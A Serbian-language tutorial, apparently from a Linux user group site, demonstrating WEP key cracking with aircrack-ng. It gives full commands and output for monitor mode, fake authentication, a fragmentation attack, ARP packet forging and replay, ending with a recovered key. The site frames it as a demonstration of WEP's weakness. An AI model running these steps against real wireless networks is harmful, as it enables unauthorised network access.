Log in


Forgot your password?
prijatelji LUGoNSa
gnu.gif
linuxzasve.jpg
hulk.jpg
zextras_logo.png
 
You are here: Home / Uputstva / Opšte / WEP cracking

WEP cracking

by milobit last modified Dec 14, 2009 11:17 PM
Ovo upustvo ima za cilj da pokaže koliko je WEP zaključavanje wireless uređaja nesigurno.

NAPOMENA!!!

Ovo upustvo napisano je radi boljeg razumevanja kao i poboljšanja sigurnosti bežičnih mreža i nikako nije upustvo koje treba da služi za upadanje i razbijanje tuđih mreža. Svaki upad na tuđu mrežu i računar bez odobrenja njegovog vlasnika je kažnjivo po zakonu!!!

 

 ARP request replay attack je metoda koja će biti opisana u ovom upustvu. Klasični napad ARP zahtevom repodukcije (ARP request replay attack) je najefikasniji način da se stvaraju novi inicijalini vektori (Initialization Vectors - IVs) da bi se pomoću njih moglo doći do WEP ključa. Ova metoda je brza, veoma efikasna i jednostavna. Program sluša za ARP paket i tada ga reemituje natrag do pristupne tačke ili ti AP-a. Ovim načinom pristupna tačka šalje novi ARP paket sa novim IV-om. Svaki put kad program pošalje isti ARP paket, pristupna tačka odgovara sa novim IV-om. Na ovaj način možemo za kratko vreme da sakupimo dovoljno IV paketa i da razbijemo WEP ključ. Pomoću ove metode nije potrebno da na pristupnoj tački bude klinenata niti bilo kakvog protoka.

 

Za ovu malu "demonstarciju sile" potreban nam je je aircrack-ng paket instaliran na laptopu kao i uporedo otvorena tri xterm-a.

 

Prvo i osnovno je pre nego što bilo šta počnemo da radimo je da "isključimo" karticu, da bi je mogli ubaciti u takozvani monitor mod.

blackpearl WEP # ifconfig wlan0 down

 Ubacivanje wlan0 kartice u monitor mod.

blackpearl  WEP # iwconfig wlan0 mode monitor

 Ponovno uključivanje wlan0 kartice u rad.

blackpearl WEP # ifconfig wlan0 up

 U prvom xterm-u startujemo airodump da vidimo kakvih paketa ima u vazduhu.

blackpearl WEP # airodump-ng wlan0

Izlaz komande (xterm 1):

 CH 3 ][ Elapsed: 12 s ][ 2009-05-22 18:06                     
                                                             
 BSSID       PWR Beacons  #Data, #/s CH MB  ENC CIPHER AUTH ESSID                     
                                                             
 00:0F:35:5C:22:92 -83    9    0  0 11 54 . WPA TKIP  PSK peglus                    
 00:13:01:3E:3B:9F -79    12    0  0  6 54 . WEP WEP     MikloNet                    
 00:15:09:14:55:C3 -77    33   373  21  6 54 . OPN       Inlog                    
 00:00:0E:BC:F8:7B -46    33    5  0  1 54e WPA2 CCMP  PSK Doniluma                    
 00:12:17:4B:34:19 -55    41    0  0 11 54 . WEP WEP     linksys                    
 00:0B:2B:20:2F:14 -58    95    0  0  6 54 . WEP WEP     pfsense                    
                                                             
 BSSID       STATION      PWR  Rate  Lost Packets Probes                        
                                                             
 00:15:09:14:55:C3 00:19:99:10:AE:93 -86  1 - 1  388   373                            
 00:00:0E:BC:F8:7B 00:0D:02:33:6E:BD  -1  1 - 0   0    1                            
 00:00:0E:BC:F8:7B 00:22:FC:50:7E:A5 -51  54e- 1   3    4

U prvom redu izlaza vidimo informacije o kanalu (CH <1-14> ), zatim vreme koje je airodump-ng uključen kao i datum i aktuelno vreme. Posle toga dolazi tabela sa pronadjenim AP-ima kao i sve o njima a zatim i klijneti koju su trenutno zakačeni na AP-je. Pojedini vrednosti u tabeli su:

 • BSSID = Mac adresa AP-a
 • PWR = Jačina signala
 • RXQ = RXQ je promenjiva od airdump programa, njena maksimalna vrednost je 100
 • Beacons = Na osnovu beacons paketa može se ustanoviti da li je signal dobar ili loš. Ako je brojač spor i ima pauze onda je signal preslab.
 • #Data = Broj uhvaćenih i memorisanih paketa (samim tim i IV)
 • #/s = Broj paketa u sekundi
 • CH = Kanal WLAN mreže
 • MB = Brzina Wlan mreže (u MBit-ima)
 • ENC =  Enkripcija
 • Cipher = Ime algoritma koji se koristi za šifrovanje i dešifrovanje
 • Auth = Autentifikacija
 • ESSID = Ime AP-a, na primer linksys

 

Pošto smo izabrali metu AP cije je ime linksys, čija mac adresa je  00:12:17:4B:34:19 i koje salje signal na kanalu 11. Startovacemo airdump-ng da samo sluša na kanalu 11 i da samo sakuplja pakete sa ove mac adrese. Ova naredba je odrađena u prvom xterm-u i ona ostaje upaljena sve vreme.

blackpearl WEP # airodump-ng -c 11 -w linksys --bssid 00:12:17:4B:34:19  wlan0

 Gde je:

 • -c <channel> slušati samo na ovom kanalu ( ovom slučaju kanal 11 )
 • -w <file> opcija za ime fajla u kome će sakupljeni paketi biti memorisani
 • --bssid <MAC> sukpljati pakete samo sa ove mac adrese (Mac adresa napadnutog AP-a)
 • wlan0 ime iterfejsa mrežne kartice

 

Izlaz komande (xterm 1):

 CH 11 ][ Elapsed: 8 s ][ 2009-05-22 18:11                     
                                                             
 BSSID       PWR RXQ Beacons  #Data, #/s CH MB  ENC CIPHER AUTH ESSID                   
                                                             
 00:12:17:4B:34:19 -38 78    60    0  0 11 54 . WEP WEP     linksys                  
                                                             
 BSSID       STATION      PWR  Rate  Lost Packets Probes      

 Kao što se iz izlaza ove komande može videti na AP-u nema nikoga kao i da nema nikakvog protoka.  Zbog toga ćemo da laziramo identifikaciju.

blackpearl WEP # aireplay-ng -1 0 -e linksys -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0

Gde je:

 • -1 opcija za lažiranje autentifikacije (fake authentication)
 •  0 reasocijacija vremena u sekundama (reassociation timing in seconds)
 • -e <essid> je ime wireless mreže AP-a koga napadamo
 • -a <MAC> mac adresa AP-a
 • -h <MAC> mac adresa laptop wireless kartice
 • wlan0 ime iterfejsa mrežne kartice

 

Izlaz komande (xterm 2):

blackpearl WEP # aireplay-ng -1 0 -e linksys -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0
16:55:50 Waiting for beacon frame (BSSID: 00:12:17:4B:34:19) on channel 11

16:55:50 Sending Authentication Request (Open System) [ACK]
16:55:50 Authentication successful
16:55:50 Sending Association Request [ACK]
16:55:51 Association successful :-) (AID: 1)
blackpearl WEP #

 Poslalil smo zahtev za prijavu autetifikacije i dobili ga.

Izlaz komande (xterm 1):

CH 11 ][ Elapsed: 8 s ][ 2009-05-22 18:11                     
                                                             
 BSSID       PWR RXQ Beacons  #Data, #/s CH MB  ENC CIPHER AUTH ESSID                   
                                                             
 00:12:17:4B:34:19 -38 78    60    0  0 11 54 . WEP WEP     linksys                  
                                                             
 BSSID       STATION      PWR  Rate  Lost Packets Probes

 00:12:17:4B:34:19 00:19:D2:85:0D:6F  0  1 - 0   0     6 

Pogledom na prvi xterm videćemo da se pojavio klijent na AP i da je zahtev za authentifikaciju prošao.

blackpearl WEP # aireplay-ng -5 -b 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0

Gde je:

 • -5  napad pomoću fragmentiranog paketa ( fragmentation attack )
 • -b <MAC> mac adresa AP-a
 • -h <MAC> mac adresa wireless kartice laptopa
 • wlan0 ime iterfejsa mrežne kartice

 

Izlaz komande (xterm 2):

blackpearl WEP # aireplay-ng -5 -b 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0
16:56:13 Waiting for beacon frame (BSSID: 00:12:17:4B:34:19) on channel 11
16:56:13 Waiting for a data packet...
Read 71 packets...

    Size: 349, FromDS: 1, ToDS: 0 (WEP)

       BSSID = 00:12:17:4B:34:19
     Dest. MAC = 01:00:5E:7F:FF:FA
     Source MAC = 00:12:17:4B:2C:67

    0x0000: 0842 0000 0100 5e7f fffa 0012 174b 3419 .B....^.....K4.
    0x0010: 0012 174b 2c67 303e a000 0000 3bb0 fe47 ...K,g0>....;..G
    0x0020: f758 c825 7faa acfe aac6 dbe2 f38b 0c41 .X.%..........A
    0x0030: 2e79 6f41 5965 d94d 8e82 0480 a219 d984 .yoAYe.M........
    0x0040: e834 4058 84c4 3024 7e91 8da3 6c8a 27e1 .4@X..0$~...l.'.
    0x0050: 3e75 2a45 3cef 970a 57d7 1ad8 3fb8 631c >u*E<...W...?.c.
    0x0060: 4758 d285 d982 4f95 8c8b 0bb7 ee83 423f GX....O.......B?
    0x0070: 9207 7a9f ce5f 55de d1ab 0a8c 196b ab34 ..z.._U......k.4
    0x0080: c4c6 130d 558a d274 415d d39f 45b7 ea35 ....U..tA]..E..5
    0x0090: 5c5f 6bd6 158e 237a c240 5b89 69eb df23 \_k...#z.@[.i..#
    0x00a0: 0ede 6368 9a30 e16b 8904 e91b 730e d010 ..ch.0.k....s...
    0x00b0: 058a e8ad 7478 5f0b 8fae 09b1 4923 090e ....tx_.....I#..
    0x00c0: a8dd 051d 04b1 ef80 1ce2 01a5 634e 0b8d ............cN..
    0x00d0: eb90 aff8 7739 3006 113a d63b 8fed bc3f ....w90..:.;...?
    --- CUT ---

Use this packet ?

Odgovoriti sa y (yes). Posle  toga dobijamo sledeće:

Saving chosen packet in replay_src-0522-165618.cap
16:56:23 Data packet found!
16:56:23 Sending fragmented packet
16:56:23 Got RELAYED packet!!
16:56:23 Trying to get 384 bytes of a keystream
16:56:24 Got RELAYED packet!!
16:56:24 Trying to get 1500 bytes of a keystream
16:56:24 Got RELAYED packet!!
Saving keystream in fragment-0522-165624.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
blackpearl WEP #

 

blackpearl WEP # packetforge-ng -0 -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F -k 255.255.255.255 -l 255.255.255.255 -y fragment-0522-165624.xor -w arp-request

 Gde je:

 • -0 indicates you want a arp request packet generated
 • -a <MAC> mac adresa AP-a
 • -h <MAC> mac adresa wireless kartice laptopa
 • -k <ip[:port]> : set Destination IP [Port]
 • -l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
 • -y <file> : read PRGA from this file
 • -w <file> : write packet to this pcap file

 

Izlaz komande (xterm 2):

blackpearl WEP # packetforge-ng -0 -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F -k 255.255.255.255 -l 255.255.255.255 -y fragment-0522-165624.xor -w arp-request
Wrote packet to: arp-request
blackpearl WEP #

 

blackpearl WEP # aireplay-ng -2 -r arp-request wlan0

Gde je:

 • -2 interaktivna selekcija frejma (interactive frame selection)
 • -r arp-request je ime fajla u kome se nalazi poslednji uspešni ARP replay
 • wlan0 ime iterfejsa mrežne kartice

 

Izlaz komande (xterm 2):

blackpearl WEP # aireplay-ng -2 -r arp-request wlan0
No source MAC (-h) specified. Using the device MAC (00:19:D2:85:0D:6F)


    Size: 68, FromDS: 0, ToDS: 1 (WEP)

       BSSID = 00:12:17:4B:34:19
     Dest. MAC = FF:FF:FF:FF:FF:FF
     Source MAC = 00:19:D2:85:0D:6F

    0x0000: 0841 0201 0012 174b 3419 0019 d285 0d6f .A.....K4......o
    0x0010: ffff ffff ffff 8001 ac00 0000 1609 c02f .............../
    0x0020: f200 d6f3 f5e6 8b78 8794 24bd ab9e 714c .......x..$...qL
    0x0030: 61f3 05ea f074 b584 8cb8 f5ae c917 92e2 a....t..........
    0x0040: 014d 0c1e                .M..

Use this packet ? y

Saving chosen packet in replay_src-0522-165713.cap
You should also start airodump-ng to capture replies.

Send 41325 packets...(500 pps)

 

blackpearl  WEP # aircrack-ng linksys-02.cap

 

Izlaz komande (xterm 3):

               Aircrack-ng 1.0 rc3


         [00:00:01] Tested 468092 keys (got 39942 IVs)

  KB  depth  byte(vote)
  0  0/ 1  0E(55552) A7(50944) 76(50176) 74(47104) F4(47104) 
  1  0/ 9  FA(50176) C6(47872) A5(47616) 6E(47360) 38(47104) 
  2  0/ 1  9A(55808) 9F(49408) 45(47616) E1(47360) 42(46848) 
  3  0/ 1  1A(55808) 0D(49664) 3C(47872) B0(47872) 57(47104) 
  4  0/ 1  83(61952) C1(51456) CE(49920) 1A(48640) D6(48384) 
  5  0/ 1  F5(56064) D9(48640) 21(47360) FE(46848) 26(46336) 
  6  6/ 9  81(46592) 6E(46336) A8(46336) F1(46336) 3E(46080) 
  7  0/ 3  11(52736) EF(50432) 7E(49920) B2(48128) B8(47360) 
  8  2/ 3  2C(48896) 7D(47872) F6(47872) AA(47616) 5C(46336) 
  9  2/ 16  83(47872) 8A(47616) E6(47616) 23(47360) 28(46848) 
  10  0/ 5  0B(50944) 6D(48128) 0F(47872) 26(47872) 69(47616) 
  11  0/ 3  2E(50432) 51(47616) 23(47104) A0(46592) 07(46080) 
  12  0/ 3  3E(51968) 7F(50432) 05(49152) 69(46848) CB(46848) 

       KEY FOUND! [ 0E:FA:9A:1A:83:F5:74:11:2C:83:0B:2E:3E ] 
    Decrypted correctly: 100%


blackpearl WEP #

 

Zaključak

Za samo 11 minuta aircrack-ng uspeo je da pronađe 128bitni ključ (wep ključ 104bit + 24bit IV) bez da je bilo ikakvog protoka na AP-u i mac filtera.

 

Sva potrebna dokumentacija nalazi se na aircrack-ng strani. Odličan video tutorial pogledajte ovde.

 

Document Actions